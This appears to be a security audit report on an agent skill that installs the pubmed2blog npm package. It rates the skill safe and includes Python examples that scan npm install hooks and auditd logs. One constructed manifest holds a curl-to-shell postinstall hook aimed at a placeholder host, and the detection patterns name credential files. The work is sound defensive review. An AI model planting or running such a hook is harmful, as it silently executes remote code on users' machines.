Is holic101/pubmed2blog safe?

https://github.com/openclaw/skills/tree/main/skills/holic101/pubmed2blog

84
SAFE

The pubmed2blog skill's SKILL.md is clean: it contains no prompt injection, no hidden instructions, no embedded URLs for autonomous fetching, and no obfuscation techniques. The primary risk is indirect — the npm install -g pubmed2blog install directive installs an unvetted global npm package whose preinstall/postinstall scripts were never executed in the sandbox, meaning any malicious install-time code would remain unobserved. Additionally, the pubmed2blog init API key setup flow and the unvetted Z.AI provider represent plausible credential harvesting and content exfiltration vectors if the npm package is compromised. Canary file integrity was confirmed clean throughout.

Category Scores (score out of 100 · weight in overall score)

Prompt Injection 92/100 · 30%
Data Exfiltration 80/100 · 25%
Code Execution 72/100 · 20%
Clone Behavior 92/100 · 10%
Canary Integrity 95/100 · 10%
Behavioral Reasoning 75/100 · 5%

Findings (5)

MEDIUM Unvetted global npm package install -28

The skill's install directive runs npm install -g pubmed2blog, installing a third-party npm package globally under the invoking user's privileges. The npm package was not executed during sandbox testing, so its preinstall/postinstall scripts were never observed. A malicious postinstall hook could perform arbitrary code execution, credential theft, or backdoor installation silently at install time. Installing with npm install --ignore-scripts, or inspecting the scripts field of the published package.json before installing, closes the install-time gap but says nothing about what the binary does once invoked.
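The check a reviewer would run before accepting an install directive like this one, as an added example (not code from the audit or from the pubmed2blog project): read the lifecycle hooks out of the published manifest and flag the patterns that most often mark install-time malware. The manifest below is constructed to show the shape of a bad hook; it is not the real pubmed2blog package.json, which would normally be obtained with `npm pack pubmed2blog` and unpacked.

```python
import json
import re

# Lifecycle hooks that npm runs automatically during `npm install` / `npm install -g`.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")

# Coarse indicators of install-time code that deserves a manual read before installing.
SUSPICIOUS_PATTERNS = {
    "remote-pipe-to-shell": re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"),
    "base64-decode": re.compile(r"base64\s+(-d|--decode)|atob\(|Buffer\.from\([^)]*base64"),
    "eval": re.compile(r"\beval\b|new Function\("),
    "node-e": re.compile(r"\bnode\s+-e\b"),
    "credential-paths": re.compile(r"\.ssh|\.aws|\.npmrc|\.env\b|\.docker/config\.json"),
}


def lifecycle_script_report(package_json_text: str) -> dict:
    """Return {hook: {"command": str, "indicators": [pattern names]}} for every
    lifecycle hook declared in the manifest. An empty dict means npm runs nothing
    at install time for this package (its dependencies are a separate question)."""
    manifest = json.loads(package_json_text)
    scripts = manifest.get("scripts") or {}
    report = {}
    for hook in LIFECYCLE_HOOKS:
        command = scripts.get(hook)
        if command is None:
            continue
        indicators = [name for name, pat in SUSPICIOUS_PATTERNS.items() if pat.search(command)]
        report[hook] = {"command": command, "indicators": indicators}
    return report


def verdict(report: dict) -> str:
    """Turn the hook report into the decision a reviewer has to make."""
    if not report:
        return "no lifecycle scripts: nothing runs at install time; review the code that runs on invocation instead"
    if any(entry["indicators"] for entry in report.values()):
        return "BLOCK: an install-time script matches a suspicious pattern; do not install without reading it"
    return "REVIEW: install-time scripts present; read them before installing without --ignore-scripts"


# Constructed manifest (hypothetical package, not pubmed2blog) with the kind of
# postinstall hook the finding above warns about.
SAMPLE_MANIFEST = json.dumps({
    "name": "example-cli",
    "version": "1.0.0",
    "bin": {"example-cli": "bin/cli.js"},
    "scripts": {
        "postinstall": "curl -s https://example.invalid/setup.sh | sh",
        "test": "node test.js",
    },
})

if __name__ == "__main__":
    report = lifecycle_script_report(SAMPLE_MANIFEST)
    print(json.dumps(report, indent=2))
    print(verdict(report))
```

The pattern list is deliberately small; its job is to force a human read of any hook, not to prove a package clean. A manifest with no hooks still pulls in dependencies with their own hooks, so the same report should be run over every package.json in the unpacked tree.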

MEDIUM API key collection via interactive init command -12

The pubmed2blog init command is described as 'Interactive setup for API keys and preferences' supporting Anthropic, OpenAI, and Z.AI providers. If the underlying npm package is malicious or compromised, running init would deliver live API credentials directly to attacker-controlled infrastructure. An agent following the skill's usage instructions would naturally run init as part of setup.

LOW Unvetted third-party AI provider (Z.AI) -8

The skill advertises Z.AI as a supported inference provider alongside Anthropic and OpenAI. Z.AI is not a widely recognized provider, and the skill does not say where its endpoints are hosted or how submitted content is retained, so healthcare blog content generated through it would leave the user's environment for infrastructure the skill never identifies. The prompts and source material behind patient-facing articles could carry sensitive medical context.

LOW Cron scheduling creates persistence vector if npm package is malicious -10

The skill explicitly instructs agents to 'Schedule via cron for regular content generation.' While legitimate for the stated use case, if the installed pubmed2blog binary is malicious, an agent following this instruction would establish a persistent execution foothold that survives session termination.

INFO Credential file accesses observed but attributed to monitoring framework -5

auditd PATH records show .env, .ssh/id_rsa, .aws/credentials, .npmrc, .docker/config.json, and .config/gcloud/application_default_credentials.json were opened at two points during the audit. Both access clusters occur at identical millisecond timestamps (all six files at 1771934673.087 and again at 1771934696.052), consistent with the oathe monitoring system's pre-install baseline read and post-install comparison scan rather than the skill or npm package. Identical timestamps are consistent with a scanner but are not attribution on their own; the SYSCALL record sharing each PATH record's serial carries the pid, comm and exe fields that would confirm which process performed the opens. Canary integrity confirmed clean.
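The timestamp-clustering reasoning used in this finding, as an added example (not code from the audit, the oathe monitor, or pubmed2blog): parse auditd PATH records, keep only the watched credential files, group them by millisecond timestamp, and label a cluster that touches every watched file in the same millisecond as a scanner baseline read. The audit lines are constructed to mirror the two clusters above plus one lone credential read that the same heuristic would flag instead; the home directory and serial numbers are assumptions.

```python
import re
from collections import defaultdict

# Credential files a content-generation tool has no reason to open.
SENSITIVE_SUFFIXES = (
    "/.env",
    "/.ssh/id_rsa",
    "/.aws/credentials",
    "/.npmrc",
    "/.docker/config.json",
    "/.config/gcloud/application_default_credentials.json",
)

# audit(TIMESTAMP:SERIAL) header plus the name="..." field of a PATH record.
PATH_RECORD = re.compile(
    r'type=PATH msg=audit\((?P<ts>\d+\.\d+):(?P<serial>\d+)\):.*?\bname="(?P<name>[^"]+)"'
)


def sensitive_access_clusters(audit_lines):
    """Group sensitive-file PATH records by millisecond timestamp.
    Returns {timestamp: sorted list of distinct sensitive paths opened then}."""
    clusters = defaultdict(set)
    for line in audit_lines:
        m = PATH_RECORD.search(line)
        if not m:
            continue
        name = m.group("name")
        if name.endswith(SENSITIVE_SUFFIXES):
            clusters[m.group("ts")].add(name)
    return {ts: sorted(paths) for ts, paths in clusters.items()}


def classify(clusters, expected_count=len(SENSITIVE_SUFFIXES)):
    """Heuristic from the finding: every watched file opened in the same
    millisecond looks like a scanner's baseline read; anything else is a
    targeted read that needs attribution to a process."""
    return {
        ts: ("baseline-scan" if len(paths) == expected_count else "targeted-read")
        for ts, paths in clusters.items()
    }


def _path_record(ts, serial, name):
    # Constructed record in auditd PATH format, trimmed to the fields the parser reads.
    return (f'type=PATH msg=audit({ts}:{serial}): item=0 name="{name}" inode=4242 '
            f'dev=fd:01 mode=0100600 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL')


HOME = "/home/agent"  # assumed home directory for the constructed records
SAMPLE_AUDIT_LOG = []
# The two clusters reported above: all six files at each of two timestamps.
for ts, serial in (("1771934673.087", 9001), ("1771934696.052", 9107)):
    for i, suffix in enumerate(SENSITIVE_SUFFIXES):
        SAMPLE_AUDIT_LOG.append(_path_record(ts, serial + i, HOME + suffix))
# Constructed counterexample: a single credential read at its own moment.
SAMPLE_AUDIT_LOG.append(_path_record("1771934680.311", 9050, HOME + "/.aws/credentials"))
# Unrelated file access that must be ignored.
SAMPLE_AUDIT_LOG.append(_path_record("1771934680.400", 9051, "/usr/lib/node_modules/x/index.js"))

if __name__ == "__main__":
    found = sensitive_access_clusters(SAMPLE_AUDIT_LOG)
    for ts, label in sorted(classify(found).items()):
        print(ts, label, found[ts])
```

Set expected_count to the number of files the monitor is known to baseline; if the scanner's list is longer than the watched list, the same-millisecond test still holds but the count comparison needs the scanner's figure rather than this list's.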